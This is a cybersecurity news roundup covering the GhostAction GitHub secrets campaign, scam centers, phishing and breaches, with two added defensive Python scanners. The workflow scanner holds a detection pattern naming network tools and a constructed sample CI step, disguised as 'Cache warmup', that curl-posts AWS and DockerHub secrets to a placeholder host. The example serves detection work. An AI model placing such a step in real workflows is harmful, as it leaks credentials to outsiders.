Cybersecurity News: GhostAction campaign, scam centers grow, GPUGate hits IT

In today’s cybersecurity news…

GhostAction campaign targets GitHub

On September 2nd, GitGuardian discovered that the account behind a GitHub project it uses internally, FastUUID, had been compromised. The attacker enumerated the secrets referenced in the project's workflow files, then hardcoded those secret names into the workflows. Investigating that compromise, the company found indicators pointing to a larger campaign, dubbed GhostAction, that affected 327 GitHub users and 817 repositories. The campaign leaked over 3,300 secrets, including AWS instances, DockerHub tokens, and NPM tokens. GitGuardian notified the GitHub, PyPI, and NPM security teams about the campaign, and many affected repositories have already been reverted.

(Security Week)
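The GhostAction technique described above, an injected workflow step that reads `${{ secrets.* }}` values and ships them to an outside host, is something a repository owner can audit for. The following scanner is an added example, not GitGuardian's or GitHub's tooling: it lists every secret a workflow references (so the set can be compared with what the pipeline legitimately needs) and flags any `run:` step that combines a secret reference, a download/upload tool, and a URL outside an assumed allowlist of trusted hosts. The workflow text and the host allowlist are constructed for the example.

```python
"""Audit GitHub Actions workflow text for steps that could move repository
secrets off the runner.  Added example; regex-based so it needs no PyYAML."""
import re
from urllib.parse import urlparse

# ${{ secrets.NAME }} references inside workflow text.
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
URL_RE = re.compile(r"""https?://[^\s"'`)]+""")
# Tools commonly used to push data over the network from a shell step.
NET_TOOLS = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|iwr)\b")
# Hosts a CI workflow is normally expected to talk to (assumed allowlist;
# a real deployment would maintain its own).
TRUSTED_HOSTS = {"github.com", "api.github.com", "pypi.org",
                 "upload.pypi.org", "registry.npmjs.org", "hub.docker.com"}

RUN_LINE = re.compile(r"^(?P<ws>\s*)(?P<dash>-\s+)?run:\s*(?P<rest>.*)$")


def split_run_steps(workflow_text):
    """Yield the shell text of each `run:` key, handling both the one-line
    form (`run: cmd`) and YAML block scalars (`run: |` / `run: >`)."""
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_LINE.match(lines[i])
        if not m:
            i += 1
            continue
        key_col = len(m.group("ws")) + len(m.group("dash") or "")
        rest = m.group("rest").strip()
        if rest in ("", "|", ">", "|-", ">-", "|+", ">+"):
            # Block scalar: everything indented deeper than the `run` key.
            body = []
            i += 1
            while i < len(lines) and (
                lines[i].strip() == ""
                or len(lines[i]) - len(lines[i].lstrip()) > key_col
            ):
                body.append(lines[i])
                i += 1
            yield "\n".join(body)
        else:
            yield rest
            i += 1


def audit_workflow(workflow_text):
    """Return the secrets the workflow references and any steps that look
    like they send a secret to a host outside TRUSTED_HOSTS."""
    findings = []
    for step in split_run_steps(workflow_text):
        secrets = set(SECRET_REF.findall(step))
        dumps_all = "toJSON(secrets)" in step  # dumps the whole secrets context
        hosts = {urlparse(u).hostname for u in URL_RE.findall(step)}
        untrusted = sorted(h for h in hosts if h and h not in TRUSTED_HOSTS)
        if (secrets or dumps_all) and untrusted and NET_TOOLS.search(step):
            names = sorted(secrets) + (["<all secrets>"] if dumps_all else [])
            findings.append({"secrets": names, "hosts": untrusted})
    return {
        "referenced": sorted(set(SECRET_REF.findall(workflow_text))),
        "findings": findings,
    }


# Constructed workflow: a legitimate publish step, an injected exfiltration
# step disguised as "Cache warmup", and a benign call to the GitHub API.
SAMPLE_WORKFLOW = """\
name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish
        run: twine upload dist/*
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_TOKEN }}
      - name: Cache warmup
        run: |
          curl -s -X POST https://collector.invalid/upload \\
            -d "aws=${{ secrets.AWS_SECRET_ACCESS_KEY }}" \\
            -d "docker=${{ secrets.DOCKERHUB_TOKEN }}"
      - name: Notify
        run: curl -s https://api.github.com/repos/${{ github.repository }} -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}"
"""

if __name__ == "__main__":
    report = audit_workflow(SAMPLE_WORKFLOW)
    print("secrets referenced:", ", ".join(report["referenced"]))
    for f in report["findings"]:
        print("SUSPICIOUS: secrets", f["secrets"], "sent to", f["hosts"])
```

Run it over every file under `.github/workflows/` in a pull request check, and treat any new secret name in `referenced` or any non-empty `findings` as a review blocker. The scanner is deliberately conservative: a step that only passes a secret through `env:` to a trusted publisher, as the `Publish` step does, is not reported.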

Scam centers see huge growth in Myanmar

The Guardian reports that according to new research and drone footage, the number of industrial-scale scam call centers on the Thai-Myanmar border has more than doubled since the Myanmar military coup in 2021, with construction of new facilities underway at an estimated rate of 55 hectares a month. These facilities are run by criminal organizations, with Thai police estimating at least 100,000 trafficked people in these border facilities, lured in with the promise of jobs. These elaborate facilities are heavily fortified and contain luxury housing for management, serving as social proof for investment scams. 

(The Guardian)

Spies impersonate US lawmaker to target trade groups

The Wall Street Journal’s sources say the China-backed group APT41 orchestrated a campaign in July posing as US Representative John Moolenaar, chairman of the House Committee on the Chinese Communist Party. The emails were sent from a non-governmental address to trade groups, government agencies, and law firms, with an attachment that appeared to be draft legislation and a request for input. An investigation by Google’s Mandiant found that opening the attachments would attempt to install a backdoor. At the time the emails were sent, the US was set to begin trade talks with China in Sweden.

(Security Week, WSJ)

GPUGate targets IT firms

Researchers at Arctic Wolf detailed a new campaign, dubbed GPUGate, that puts a new twist on malicious advertising. The campaign buys paid ads on Google and other search engines that link to a GitHub commit page; that commit contains an altered link pointing to the threat actors’ infrastructure. The link initially serves a 128MB Microsoft Software Installer whose GPU-gated decryption routine keeps the payload encrypted on systems without GPU resources, which stymies analysis of the malware in a virtual machine or other sandbox that lacks a GPU. The payloads indicate the operators speak Russian, and the campaign exclusively targets IT and software development companies in Western Europe.

(The Hacker News)

Do you know the status of your compliance controls right now? Like…right now?

We know that real-time visibility is critical for security, but when it comes to our GRC programs…we rely on point-in-time checks. But more than 9,000 companies have continuous visibility into their controls with Vanta.

Vanta brings automation to evidence collection across over 35 frameworks, like SOC 2 and ISO 27001. They also centralize key workflows like policies, access reviews, and reporting, and helps you get security questionnaires done 5 times faster with AI.
Now that’s…a new way to GRC.

Get started at Vanta.com/headlines.
 

iCloud Calendar used to send phishing emails

Bleeping Computer received word of this scam from a reader, who received a message from noreply@email.apple.com advising that their PayPal account had been billed and providing support numbers to dispute the transaction. Calling the number led to the scammers attempting to install some “helpful” software so the customer could log into their PayPal account to initiate a refund. The attackers sent this message as an iCloud Calendar event to a Microsoft 365 email address, which was itself a mailing list that distributed the invitation to a list of potential victims. While the phishing lure is an extremely tried and true approach, the delivery method let the message pass SPF, DMARC, and DKIM email security checks.

(Bleeping Computer)
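The lesson of the iCloud Calendar case is that SPF, DKIM and DMARC only authenticate the sending domain, not the brand the message claims to speak for. A mail filter therefore needs a separate check: does the authenticated sender domain actually own the brand named in the subject or body? The code below is an added example, not Bleeping Computer's, Apple's or any vendor's filter logic. The message, the brand-to-domain table, and the phone number are constructed for the example; a real deployment would maintain its own brand table.

```python
"""Flag messages that pass SPF/DKIM/DMARC but name a brand the authenticated
sender does not own.  Added example with constructed data."""
import re
import email
from email import policy
from email.utils import parseaddr

# Assumed brand ownership table: brand keyword -> domains allowed to send
# mail about that brand.  Constructed for the example.
BRAND_DOMAINS = {
    "paypal": {"paypal.com"},
    "apple": {"apple.com", "icloud.com"},
}
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.IGNORECASE)


def parse_auth_results(msg):
    """Collect the spf/dkim/dmarc verdicts from Authentication-Results."""
    results = {}
    for value in msg.get_all("Authentication-Results", []):
        for mech, verdict in AUTH_RE.findall(str(value)):
            results[mech.lower()] = verdict.lower()
    return results


def from_domain(msg):
    """Domain of the RFC 5322 From: address, lowercased."""
    return parseaddr(str(msg.get("From", "")))[1].rpartition("@")[2].lower()


def domain_owned_by(sender, brand):
    return any(sender == d or sender.endswith("." + d) for d in BRAND_DOMAINS[brand])


def brands_mentioned(msg):
    """Brand keywords appearing in the subject or the text body."""
    body = msg.get_body(preferencelist=("plain",))
    text = (str(msg.get("Subject", "")) + "\n" + (body.get_content() if body else "")).lower()
    return {b for b in BRAND_DOMAINS if b in text}


def assess(raw_message):
    """Return the sender domain, whether the message authenticated, which
    mentioned brands the sender does not own, and an overall verdict."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    auth = parse_auth_results(msg)
    sender = from_domain(msg)
    authenticated = all(auth.get(m) == "pass" for m in ("spf", "dkim", "dmarc"))
    mismatched = sorted(b for b in brands_mentioned(msg) if not domain_owned_by(sender, b))
    if authenticated and mismatched:
        verdict = "brand_impersonation"   # legit sender, wrong brand
    elif authenticated:
        verdict = "authenticated"
    else:
        verdict = "unauthenticated"
    return {"sender_domain": sender, "authenticated": authenticated,
            "mismatched_brands": mismatched, "verdict": verdict}


# Constructed sample modelled on the calendar-invite lure: every
# authentication check passes because Apple's own domain sent it.
SAMPLE_INVITE = """\
From: iCloud <noreply@email.apple.com>
To: members@example.com
Subject: Your PayPal account has been billed $599.00
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=email.apple.com; dkim=pass header.d=email.apple.com; dmarc=pass header.from=email.apple.com
Content-Type: text/plain; charset="utf-8"

Invitation: Your PayPal account was charged $599.00.
Call +1-000-000-0000 (placeholder) to dispute this transaction.
"""

if __name__ == "__main__":
    print(assess(SAMPLE_INVITE))
```

The verdict `brand_impersonation` is the case the story describes: all three checks pass, yet the domain that authenticated (a subdomain of apple.com) has no business billing anyone for PayPal. A message about PayPal that authenticates as paypal.com comes back as plain `authenticated`, so the rule adds signal without undoing what DMARC already gives you.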

Wealthsimple confirms data breach

The Canadian fintech firm said the breach exposed sensitive information on “less than 1%” of its clients: 30,000 customers had government IDs, Social Insurance numbers, and account numbers exposed. The incident was caused by a compromised third-party software provider and was detected on August 30th. All impacted customers had been notified as of September 5th. Wealthsimple will offer the industry-standard two years of credit and dark web monitoring, and encourages all of its customers to enable 2FA.

(Infosecurity Magazine)

PACER struggles with MFA rollout

PACER is the US government-run system used by US courts to access court documents; it’s a critical backbone of the legal system. Back in April, PACER announced MFA would become mandatory on accounts that file documents or manage cases, and sent out a notice in August reminding users to enroll by the end of the year. According to reporting by the Register, some attorneys trying to enroll are seeing long website freezes when logging on, with support lines hammered, leading to multi-hour wait times. As a result, PACER lifted its end-of-year deadline and said it is switching to a phased MFA rollout. Users should not enroll until prompted by the system. 

(The Register)

Signal lets you back that chat up 

The popular encrypted messaging app announced that a beta version of chat backups is coming to Android, as both free and paid offerings. Users can back up 100MB of chats and the last 45 days of media for free, while 100GB of media backups will be available as a paid feature for $1.99 a month. Users receive a 64-character recovery key for chat backups that is generated on the device. Signal does not link backups to a user or a payment method. Cross-platform availability is in the works. This marks Signal’s first paid feature; until now, it has only accepted donations.

(TechCrunch)

Rich Stroffolino
Rich Stroffolino is a podcaster, editor, and writer based out of Cleveland, Ohio. Since 2015, he's worked in technology news podcasting and media. He dreams of someday writing the oral history of Transmeta.